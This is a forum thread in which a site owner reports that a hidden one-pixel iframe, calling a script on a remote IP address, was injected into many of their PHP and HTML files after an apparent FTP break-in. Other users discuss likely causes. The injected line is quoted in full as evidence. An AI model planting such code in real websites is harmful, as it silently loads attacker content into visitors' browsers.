Recently we noticed a full screen LG ad on our website. We only run Tribal Fusion and IntelliTxt and neither of those should be displaying a full screen ad.

We looked in to it and this code was added to MANY of our php and html files:

<.iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'><./iframe>

The IP that illegal accessed our FTP is: 81.95.149.75

That IP comes back registered to Panama. I've already sent the abuse email a letter with proof. It appears we were somehow exploited and a mass script ran adding the code at the bottom of the files affected.

Just FYI for all.

How did it accessed your files? Can you share the story?

Obvisously his server was comprimised due to a exploit in some software being ran.

Obvisously his server was comprimised due to a exploit in some software being ran.

exactly

Just wondering what all software besides vBulletin are you currently running?

Just wondering what all software besides vBulletin are you currently running?

No other 'official' software or scripts. Our entire site besides vb is custom coded in php. Actually I take that back, we do run vbseo as well.


It doesn't seem as if it was directed to the forums, but more so PHP overall.

Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files where changed from another account on the same server.

Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files where changed from another account on the same server.

We're on a dedi server, but having ftp/shell access is a possibility.

I have to say it was pretty unique. First time I've seen anyone access a site and modify php files for a monetary gain.

That happens all the time.

"Hackers" are not anymore what they used to be (just hacking for the thrill/kick). Hacks and exploits are being sold these days for commercial purposes.